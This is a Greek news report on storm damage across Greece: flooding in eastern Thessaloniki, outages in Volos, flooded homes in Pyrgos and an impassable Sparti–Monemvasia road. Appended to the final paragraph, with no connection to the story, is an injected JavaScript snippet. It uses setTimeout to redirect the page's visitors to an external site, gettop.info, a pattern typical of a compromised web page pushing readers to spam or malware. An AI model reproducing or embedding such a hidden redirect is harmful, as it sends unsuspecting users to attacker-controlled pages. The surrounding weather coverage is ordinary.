Προβλήματα από την κακοκαιρία στη χώρα

0
7
ΑΘΗΝΑ ΚΑΚΟΚΑΙΡΙΑ

 

Έντονα καιρικά φαινόμενα σημειώνονται σε πολλές πόλεις της Ελλάδας με έντονες βροχοπτώσεις και καταιγίδες.

Προβλήματα προκάλεσε η βροχόπτωση στην ανατολική Θεσσαλονίκη. Η Πυροσβεστική Υπηρεσία δέχθηκε 20 κλήσεις για άντληση υδάτων σε Επανομή, Μηχανιώνα και Αγία Τριάδα.Λόγω της βροχόπτωσης δεν έλειψαν τα τροχαία ατυχήματα.

Σοβαρά προβλήματα στις συγκοινωνίες, στις επικοινωνίες και την ηλεκτροδότηση σημειώθηκαν στην ευρύτερη περιοχή του Βόλου από τη σφοδρή καταιγίδα. Απο την κακοκαιρία πλημμύρισαν δρόμοι, όπως στη Νεάπολη και μπροστά στην ΑΓΕΤ – Ηρακλής, όπου με μεγάλη δυσκολία περνούσαν τη «λίμνη» τα αυτοκίνητα. Χωρίς τηλέφωνα, έμειναν για περισσότερες από 4 ώρες το κέντρο και οι ανατολικές περιοχές του Βόλου.

Πλημμυρικά φαινόμενα και πτώσεις δένδρων έχει προκαλέσει το κύμα κακοκαιρίας, που πλήττει περιοχές της Ηλείας. Σύμφωνα με όσα ανέφερε στο Αθηναϊκό Πρακτορείο, ο αντιπεριφερειάρχης Ηλείας Γιώργος Γεωργιόπουλος, τα περισσότερα προβλήματα εντοπίζονται κυρίως στην πόλη του Πύργου και τα γειτονικά χωριά, όπου λόγω της έντονης βροχόπτωσης, αλλά και της υπερχείλισης χειμάρρων, καταγράφηκαν πλημμύρες σε σπίτια και καταστήματα.

Περιορισμένες πλημμύρες, κυρίως σε δρόμους, καταγράφηκαν και στην Κυλλήνη.

Από την ισχυρή νεροποντή στην ευρύτερη περιοχή των Μολάων στην ανατολική Λακωνία, ανέβηκε η στάθμη των νερών, στην εθνική οδό Σπάρτης – Μονεμβασιάς και τα προβλήματα εστιάζονται από την περιοχή της Γκαγκανιάς έως το χωριό της Συκιάς. Μαζί με τα νερά το οδόστρωμα γέμισε με λάσπες, χώματα και σε αρκετά σημεία ο δρόμος έγινε αδιάβατος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here